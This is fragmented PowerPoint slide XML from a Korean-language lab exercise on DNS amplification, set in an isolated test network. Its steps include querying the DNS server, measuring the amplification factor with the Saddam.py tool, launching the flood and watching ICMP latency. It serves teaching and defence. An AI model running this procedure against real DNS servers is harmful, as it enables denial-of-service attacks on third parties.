                  <a:lumMod val="7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- DNS Amplification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공격을 수행할 수 있다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lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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- DNS Amplification </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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공격을 방어할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="9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EC8135D1-75B8-4CE8-AF52-A075050006C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="585225" y="2090876"/>
            <a:ext cx="730420" cy="730420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6">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent6">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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244678E-3E32-4375-A935-CA411D9F8F9B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6263266" y="2090876"/>
            <a:ext cx="730420" cy="730420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2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent2">
                    <a:lumMod val="40000"/>
                    <a:lumOff val="60000"/>
                  </a:schemeClr>
                </a:gs>
              </a:gsLst>
              <a:lin ang="5400000" scaled="1"/>
            </a:gra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gradFill>
                <a:gsLst>
                  <a:gs pos="0">
                    <a:schemeClr val="accent6">
                      <a:lumMod val="75000"/>
                    </a:schemeClr>
                  </a:gs>
                  <a:gs pos="88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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Picture 8" descr="cent os 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B355687-60F8-4A97-9717-DF06525177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703" b="-400"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6394394" y="2199019"/>
            <a:ext cx="499434" cy="500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5E04B7BD-7FFA-4CF6-8896-A184055B3CEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178875" y="2105495"/>
            <a:ext cx="4432682" cy="838800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent2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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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실습</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="7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환경</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="7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sv-SE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DNS Attacker(Kali Linux / 10.10.1.166)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="sv-SE" altLang="ko-KR" sz="10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lang="sv-SE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DNS Victim(CentOS 6.4 / 10.10.1.101) + DDWRT(10.10.1.1)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="화살표: 오른쪽 16">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81ED7C86-D7B4-4134-B0EF-1B7A83056B06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="580444" y="596349"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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Picture 10" descr="question icon 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4749B9AA-465F-472F-A9B6-76C8B11FC6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01" t="17407" r="19467" b="25308"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="717195" y="3461755"/>
            <a:ext cx="456918" cy="463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BC968331-6BDC-4EF6-BD34-D24E17DAB382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110"/>
          </a:xfrm>
        </p:grpSpPr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B846F5E4-F54B-48E4-884D-8B11C27E605D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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1A05602-C5D7-4549-9695-4E18B65B363A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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21" name="화살표: 오른쪽 20">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B386215C-A1C0-4471-8A61-6BCBE3FCC914}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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2921766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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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2DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버 테스트</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># dig @10.10.1.101 example.com</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ dig : DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버에 질의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>응답에 활용하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Command-line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>툴로서 도메인 분석 등에 활용 되고 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="10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B02FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="368998"/>
            <a:ext cx="5616792" cy="6120000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ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>증폭 지수 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># python /root/Saddam.py benchmark –d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns.txt:example.com</a:t>
            </a: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 marL="171450" indent="-1714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/>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>배 증폭 가능함을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격 효과 확인을 위해 공격 대상 호스트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(10.10.1.1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>메시지 전송</a:t>
            </a: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4C33198-2E58-4A38-8153-C72034623E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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1BD440D7-A4B6-422E-BEF0-DA734161F7A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C45BEB1-A639-4FC8-BFA8-B46B8EC4E337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F00BAB-BC11-49E5-AFFF-32BB961D8637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CDD7370-2AB2-4B53-B728-657DF13B3F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498" y="1405466"/>
            <a:ext cx="5400040" cy="3317748"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8D526DA-061F-4F54-A958-6AE5D13764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1464" y="940102"/>
            <a:ext cx="5400040" cy="1935607"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E10588D4-007E-41FA-BB9B-8B4E11F1FE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1462" y="3683301"/>
            <a:ext cx="5400040" cy="785368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11643132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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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2DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>4) DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>증폭 공격 수행</a:t>
            </a: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r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>5) ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>응답이 지연됨을 확인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B02FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>6) Ctrl + C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 공격 중지</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>7) ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>응답 시간이 정상으로 복구됨을 확인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4C33198-2E58-4A38-8153-C72034623E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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1BD440D7-A4B6-422E-BEF0-DA734161F7A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C45BEB1-A639-4FC8-BFA8-B46B8EC4E337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F00BAB-BC11-49E5-AFFF-32BB961D8637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{084362D9-AA37-45BA-85EB-5B28E38164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498" y="715904"/>
            <a:ext cx="5400040" cy="1654556"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80CDA9C7-D213-4BF4-A5B0-3E1F7E7915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498" y="2775808"/>
            <a:ext cx="5400040" cy="33078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4D382A9-BCB0-4FAD-90DC-3E573B44E5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1464" y="715904"/>
            <a:ext cx="5400040" cy="1909191"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/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id="{C110515D-8934-4EBD-9D2A-A518F8E045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1464" y="3206468"/>
            <a:ext cx="5400040" cy="26700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751232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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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4C33198-2E58-4A38-8153-C72034623E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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1BD440D7-A4B6-422E-BEF0-DA734161F7A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C45BEB1-A639-4FC8-BFA8-B46B8EC4E337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F00BAB-BC11-49E5-AFFF-32BB961D8637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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91563336-34FC-48F0-BDB5-EB9B3E13B470}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392121" y="369000"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(* history –w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>실행하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 저장</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)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pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
